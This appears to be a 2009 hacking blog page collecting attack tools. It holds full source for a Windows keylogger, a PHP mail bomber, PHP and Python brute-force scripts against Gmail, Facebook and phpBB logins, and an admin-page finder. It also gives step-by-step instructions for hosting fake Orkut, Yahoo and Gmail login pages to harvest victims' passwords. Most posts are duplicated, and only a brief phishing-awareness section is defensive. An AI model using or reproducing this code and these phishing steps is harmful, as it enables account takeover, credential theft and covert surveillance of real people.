.
.
● C99 Magnetic Edition (new)
● C100
● PHP JACKLE
● Emailseker
● egy
● k-shell
● heykir
● milworm
● Msql
● Rootshell v.1.0
● safe0ver
● stres
● toolkit
● zehir
● webshellphp
Friday, July 10, 2009
Key logger
#include
#include
#include
#include
#define VK_PERIOD '.'
#define FILENAME "log.txt"
HWND OldForegroundWindow;
HWND CurrentForegroundWindow;
HHOOK Hook;
char WindowName[256];
LRESULT CALLBACK KeyboardHook(int Code,WPARAM wParam, LPARAM lParam);
void CheckKey(int key);
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
time_t rawtime;
struct tm* time_info;
time(&rawtime);
time_info = localtime(&rawtime);
FILE *Log = fopen(FILENAME,"a+");
fprintf(Log,"\n\n Logging started at: %s \n\n",asctime(time_info));
fclose(Log);
Hook = SetWindowsHookEx(WH_KEYBOARD_LL,KeyboardHook,hInstance,0);
while(GetMessage(0,0,0,0));
return UnhookWindowsHookEx(Hook);
}
LRESULT CALLBACK KeyboardHook(int Code,WPARAM wParam, LPARAM lParam)
{
if( Code == HC_ACTION && wParam == WM_KEYDOWN )
{
if(OldForegroundWindow != (CurrentForegroundWindow = GetForegroundWindow()) )
{
FILE *File = fopen(FILENAME,"a+");
ZeroMemory(WindowName,256);
GetWindowText(CurrentForegroundWindow,WindowName,256);
fprintf(File,"\n\n [ %s ] \n\n",&WindowName);
fclose(File);
OldForegroundWindow = CurrentForegroundWindow;
CurrentForegroundWindow = NULL;
}
CheckKey(((PKBDLLHOOKSTRUCT)lParam)->vkCode);
return CallNextHookEx(Hook,Code,lParam,wParam);
}
}
void CheckKey(int Key)
{
FILE *Log = fopen(FILENAME,"a+");
switch( Key )
{
case VK_TAB:
fprintf(Log,"[TAB]",0);
break;
case VK_RETURN:
fprintf(Log,"[ENTER]",0);
break;
case VK_SPACE:
fprintf(Log," ",0);
break;
case VK_PERIOD:
fprintf(Log,".",0);
break;
default:
if(Key >= 48 && Key <= 90)fprintf(Log,"%c",GetKeyState(VK_CAPITAL)?Key:(Key+32));
};
fclose(Log);
}
#include
#include
#include
#define VK_PERIOD '.'
#define FILENAME "log.txt"
HWND OldForegroundWindow;
HWND CurrentForegroundWindow;
HHOOK Hook;
char WindowName[256];
LRESULT CALLBACK KeyboardHook(int Code,WPARAM wParam, LPARAM lParam);
void CheckKey(int key);
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
time_t rawtime;
struct tm* time_info;
time(&rawtime);
time_info = localtime(&rawtime);
FILE *Log = fopen(FILENAME,"a+");
fprintf(Log,"\n\n Logging started at: %s \n\n",asctime(time_info));
fclose(Log);
Hook = SetWindowsHookEx(WH_KEYBOARD_LL,KeyboardHook,hInstance,0);
while(GetMessage(0,0,0,0));
return UnhookWindowsHookEx(Hook);
}
LRESULT CALLBACK KeyboardHook(int Code,WPARAM wParam, LPARAM lParam)
{
if( Code == HC_ACTION && wParam == WM_KEYDOWN )
{
if(OldForegroundWindow != (CurrentForegroundWindow = GetForegroundWindow()) )
{
FILE *File = fopen(FILENAME,"a+");
ZeroMemory(WindowName,256);
GetWindowText(CurrentForegroundWindow,WindowName,256);
fprintf(File,"\n\n [ %s ] \n\n",&WindowName);
fclose(File);
OldForegroundWindow = CurrentForegroundWindow;
CurrentForegroundWindow = NULL;
}
CheckKey(((PKBDLLHOOKSTRUCT)lParam)->vkCode);
return CallNextHookEx(Hook,Code,lParam,wParam);
}
}
void CheckKey(int Key)
{
FILE *Log = fopen(FILENAME,"a+");
switch( Key )
{
case VK_TAB:
fprintf(Log,"[TAB]",0);
break;
case VK_RETURN:
fprintf(Log,"[ENTER]",0);
break;
case VK_SPACE:
fprintf(Log," ",0);
break;
case VK_PERIOD:
fprintf(Log,".",0);
break;
default:
if(Key >= 48 && Key <= 90)fprintf(Log,"%c",GetKeyState(VK_CAPITAL)?Key:(Key+32));
};
fclose(Log);
}
Bomber Mail
if($mode==""){
}else{
for($i=1;$i<=$banyak;$i++){
$headers = "From: $inp[name_from]<$inp[mail_from]>\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=\"iso-8859-1\"\r\n";
$subject = "$subjec";
$to = "$inp[mail_to]";
mail($to, $subject, $messages, $headers);
}
}
?>
PHISHING - YOU MIGHT BE THE NEXT VICTIM..
EVERYBODY MUST HAVE READ THE TERM "PHISHING" ISN'T IT??? BUT DO YOU KNOW WHAT CYBER EXPERTS CALL IT AS OR HOW A USER IS CHEATED WITH PHISHING OR WHAT ARE THE TECHNIQUES USED AND FOR MANY MORE QUESTIONS LIKE THAT..HERE IS AN EXCELLENT PIECE OF INFORMATION ABOUT PHISHING.
WHAT IS PHISHING??
Phishing means fraudulently acquiring personal information of a user
Phishing is usually performed by getting the personal information of a user using online banking and then making wrong use of it
HOW IT IS CARRIED OUT??
In a classical Phishing attack the Phisher sends the user a spam email naming it to be from the trusted organization to verify his\her account The email also contains statements like ‘legal actions threatened’ or ‘closure of account may occur’
Such emails also usually contain links which need to be clicked When the user clicks on the link the sensitive information is provided to the phisher The personal Information is then used by the phisher for any bad deeds
Here are a few phrases a phisher uses
“verify your account”
Businesses should not ask you to send passwords, login names, Social Security numbers, or other personal information through e-mail
"If you don't respond within 48 hours, your account will be closed".These messages convey a sense of urgency so that you'll respond immediately without thinking. Phishing e-mail might even claim that your response is required because your account might have been compromised.
“Click on the below link to access your account”
these sort of links are usually masked links they might have names similar to the link of the organization but they point to a wrong destination
the masking can be seen when u bring the cursor near the link
A phisher may also use con artisted URLs such as the following are used instead of
http://www.microsoft.com/
http://www.micosoft.com/
http://www.mircosoft.com/
http://www.verify-microsoft.com/
HOW PHISHING MAY AFFECT YOU ?? (To Be Continued..)
WHAT IS PHISHING??
Phishing means fraudulently acquiring personal information of a user
Phishing is usually performed by getting the personal information of a user using online banking and then making wrong use of it
HOW IT IS CARRIED OUT??
In a classical Phishing attack the Phisher sends the user a spam email naming it to be from the trusted organization to verify his\her account The email also contains statements like ‘legal actions threatened’ or ‘closure of account may occur’
Such emails also usually contain links which need to be clicked When the user clicks on the link the sensitive information is provided to the phisher The personal Information is then used by the phisher for any bad deeds
Here are a few phrases a phisher uses
“verify your account”
Businesses should not ask you to send passwords, login names, Social Security numbers, or other personal information through e-mail
"If you don't respond within 48 hours, your account will be closed".These messages convey a sense of urgency so that you'll respond immediately without thinking. Phishing e-mail might even claim that your response is required because your account might have been compromised.
“Click on the below link to access your account”
these sort of links are usually masked links they might have names similar to the link of the organization but they point to a wrong destination
the masking can be seen when u bring the cursor near the link
A phisher may also use con artisted URLs such as the following are used instead of
http://www.microsoft.com/
http://www.micosoft.com/
http://www.mircosoft.com/
http://www.verify-microsoft.com/
HOW PHISHING MAY AFFECT YOU ?? (To Be Continued..)
Phising....(HOW HACKER TAKES AWAY SOMEONE'S PASSWORD)
PHISHING 100% Working plzzzzz Dont MiSSSSsuse
guys heres the fake page of orkut,yahoo or request any other.
I WILL TRY TO COMPLETE
ORKUT PHISHING
DOWNLOAD THIS FILES
http://rapidshare.com/files/163459603/orkut.rar
AND UPLOAD ALL FILES TO WEBHOST
YAHOO
NEW YAHOO LOGIN PHISHER
LATEST YAHOO PHISHER
http://rapidshare.com/files/165982792/indian_yahoo_phisher.rar
it will update automatically
Upload all files in webhost
.html is ur phisher page and .txt is link for password
1. extract the files
2.create new account in any webhost
3.go to control panel then file manager and upload all files there
4. there is one .html(phishing page) and and one .txt(all passwords) file
5.give the .html file to victim by telling him some blah blah story
6.that's it
WEBHOSTS
http://www.100webspace.com
http://www.clawz.com
http://www.webhostme.com
http://www.siteburg.com
http://mywebhut.com
http://www.wagoo.com
http://1asphost.com
http://www.aushost.org.uk
http://www.freehosting.hostrave.com
gmail kaise bhool gaye..
here is...
http://rapidshare.com/files/167907208/mostworking_fake_pages__gmail.rar.html
Lol!! Just Go to the Login page.Right click your mouse and choose the view source page. Copy paste the entire text into a text file. Now go to the text file and the extension from .txt to .htm. Your fake page is ready for usage.
Incase you know php there is no need I should tell you further. For noobs first upload php file on to a hosting php supported website. Now go and Search for the suitable string in the login page whose clone is to be made where it says method/form action=" DB Address".Like in case of orkut
Now replace https://www.google.com/accounts/ServiceLoginAuth?service=orkut with the php file address that you have uploaded on a hosting site.Now upload the fake page also you made on to your hosting site and fetch the URL to the victim. Incase you are lucky and the victim logins you will get the password in a text file(you need to upload an additional text file also to get passwords(only for beginners not for advanced users of php) and in php file,code should be written such that it would redirect the ID and pass to this text file)
P.S:-For the complete set of phishing files of orkut download the file from the link below
http://www.freeuploading.com/files/6g010IE/orkut_rar.php
here is the sample....
Orkut Hacking 100% Working Dont Misuse
guys heres d fake page of orkut der are in total 4 files dat u simply need to upload on php supported webhost i suggest ripway
http://rapidshare.com/files/158948786/OFPFP.rar
extract the files den upload
u need not edit anything in dz
once u will upload the files u will see three files and der wud b a file
http://h1.ripway.com/xxxxxxxxxxx/confirm.html
where xxxxxxxxxxx is ur user name,u need to send this link to the victim making any story blah blah or wotever u make
once d victim enters d details in the page and d moment he will press enter u will get the username and password wotever he has typed in inside ur php supported webhost account in the fourth file dat wud be login.txt and now visible
after uploading the files you can try by typing anything in the user name and password
to view username and password click on the edit link of the login.txt file and initially this file wud be invisible u can make it visible by typing any details in the fake page urself
dont use this trick to hack unknown people,i know still many people wud do but think how u gonna feel wen ur account wud be hacked by sum1 else yup u can enjoy by hacking ur friends account still i know u will work according to ur wish
enjoy
guys heres the fake page of orkut,yahoo or request any other.
I WILL TRY TO COMPLETE
ORKUT PHISHING
DOWNLOAD THIS FILES
http://rapidshare.com/files/163459603/orkut.rar
AND UPLOAD ALL FILES TO WEBHOST
YAHOO
NEW YAHOO LOGIN PHISHER
LATEST YAHOO PHISHER
http://rapidshare.com/files/165982792/indian_yahoo_phisher.rar
it will update automatically
Upload all files in webhost
.html is ur phisher page and .txt is link for password
1. extract the files
2.create new account in any webhost
3.go to control panel then file manager and upload all files there
4. there is one .html(phishing page) and and one .txt(all passwords) file
5.give the .html file to victim by telling him some blah blah story
6.that's it
WEBHOSTS
http://www.100webspace.com
http://www.clawz.com
http://www.webhostme.com
http://www.siteburg.com
http://mywebhut.com
http://www.wagoo.com
http://1asphost.com
http://www.aushost.org.uk
http://www.freehosting.hostrave.com
gmail kaise bhool gaye..
here is...
http://rapidshare.com/files/167907208/mostworking_fake_pages__gmail.rar.html
Lol!! Just Go to the Login page.Right click your mouse and choose the view source page. Copy paste the entire text into a text file. Now go to the text file and the extension from .txt to .htm. Your fake page is ready for usage.
Incase you know php there is no need I should tell you further. For noobs first upload php file on to a hosting php supported website. Now go and Search for the suitable string in the login page whose clone is to be made where it says method/form action=" DB Address".Like in case of orkut
Now replace https://www.google.com/accounts/ServiceLoginAuth?service=orkut with the php file address that you have uploaded on a hosting site.Now upload the fake page also you made on to your hosting site and fetch the URL to the victim. Incase you are lucky and the victim logins you will get the password in a text file(you need to upload an additional text file also to get passwords(only for beginners not for advanced users of php) and in php file,code should be written such that it would redirect the ID and pass to this text file)
P.S:-For the complete set of phishing files of orkut download the file from the link below
http://www.freeuploading.com/files/6g010IE/orkut_rar.php
here is the sample....
Orkut Hacking 100% Working Dont Misuse
guys heres d fake page of orkut der are in total 4 files dat u simply need to upload on php supported webhost i suggest ripway
http://rapidshare.com/files/158948786/OFPFP.rar
extract the files den upload
u need not edit anything in dz
once u will upload the files u will see three files and der wud b a file
http://h1.ripway.com/xxxxxxxxxxx/confirm.html
where xxxxxxxxxxx is ur user name,u need to send this link to the victim making any story blah blah or wotever u make
once d victim enters d details in the page and d moment he will press enter u will get the username and password wotever he has typed in inside ur php supported webhost account in the fourth file dat wud be login.txt and now visible
after uploading the files you can try by typing anything in the user name and password
to view username and password click on the edit link of the login.txt file and initially this file wud be invisible u can make it visible by typing any details in the fake page urself
dont use this trick to hack unknown people,i know still many people wud do but think how u gonna feel wen ur account wud be hacked by sum1 else yup u can enjoy by hacking ur friends account still i know u will work according to ur wish
enjoy
LARIKA Gmail Brute Forcer
// LARIKA Gmail Brute Forcer
$dict = ""; // Your dictionary file here
$username = ""; // Your username here
$proxy = ""; // Your proxy here
$port = ""; // Your proxy port here
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_PROXY, $proxy);
curl_setopt($c, CURLOPT_PROXYPORT, $port);
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
foreach(file($dict) as $line)
{
$word = str_replace("\r\n", "", $line);
if(check_correct($username, $word, $wrong)) {
die("Found the password : ".$word."");
}
}
// Function for checking whether the username and password are correct
function check_correct($username, $password, $wrong)
{
$headers1 = array(
"Host: gmail.google.com",
"Authorization: Basic ".base64_encode($username.':'.$password),
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language: en-gb,en;q=0.5",
"Accept-Encoding: text",
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://gmail.google.com/gmail/feed/atom');
curl_setopt($c, CURLOPT_PROXY, $proxy);
curl_setopt($c, CURLOPT_PROXYPORT, $port);
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
curl_setopt($c, CURLOPT_COOKIESESSION, true);
curl_setopt($c, CURLOPT_HTTPHEADER, $headers1);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
$str = curl_exec($c);
curl_close($c);
print $str; // for debug
if($str != $wrong) {return true;}
else {return false;}
}
?>
Face Book Brute Forcer
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="brute@force.org"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found :
$line
";}
}
?>
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="brute@force.org"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found :
$line
";}
}
?>
Admin Finder
set_time_limit(0);
if (isset($_POST["submit_lol"])) {
$url = $_POST['hash_lol'];
echo "
Testing ".$url."
";
$adminlocales = array("admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.php". "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php", "administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/", "utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/", "login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/");
foreach ($adminlocales as $admin){
$headers = get_headers("$url$admin");
if (eregi('200', $headers[0])) {
echo "$url$admin Found!
";
}
else {
echo "$url$admin NOT Found!
";
}
}
}
?>
Gmail Brute Forcer
#!usr/bin/python
#Gmail Brute Forcer
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=3:
print "Usage: ./gmailbrute.py "
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com GmailBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server: https://www.gmail.com/"
print "[+] User:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[1],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen("https://www.gmail.com/")
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["Email"] = sys.argv[1]
form["Passwd"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("Gmail - Inbox", line):
print "\tSuccessful Login:", value
success = value
sys.exit(1)
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login: https://www.gmail.com/"
print "[+] User:",sys.argv[1]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
#Gmail Brute Forcer
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=3:
print "Usage: ./gmailbrute.py
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com GmailBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server: https://www.gmail.com/"
print "[+] User:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[1],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen("https://www.gmail.com/")
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["Email"] = sys.argv[1]
form["Passwd"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("Gmail - Inbox", line):
print "\tSuccessful Login:", value
success = value
sys.exit(1)
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login: https://www.gmail.com/"
print "[+] User:",sys.argv[1]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
phpBB Brute Forcer POC
#!usr/bin/python
#phpBB Brute Forcer POC
#POC because of the 5 login attempts for 30 min, proxies?
#
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./phpBBbrute.py "
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com phpBBBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] User:",sys.argv[2]
print "[+] Words Loaded:",len(words),"\n"
headers = ["Mozilla/5.0 (compatible)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)", "Windows NT 6.0 (MSIE 7.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Windows NT 4.0 (MSIE 5.0)"]
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[2],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent", random.sample(headers, 1)[0])]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen(sys.argv[1])
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["username"] = sys.argv[2]
form["password"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("invalid password", line.lower()) != None:
print "\tSuccessful Login:", value
print line
success = value
sys.exit(1)
if re.search("The maximum number of 5 login attempts has been exceeded.",line):
print "Attempts exceeded"
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login:",sys.argv[1]
print "[+] User:",sys.argv[2]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
#phpBB Brute Forcer POC
#POC because of the 5 login attempts for 30 min, proxies?
#
#To use this script you need ClientCookie and Client Form.
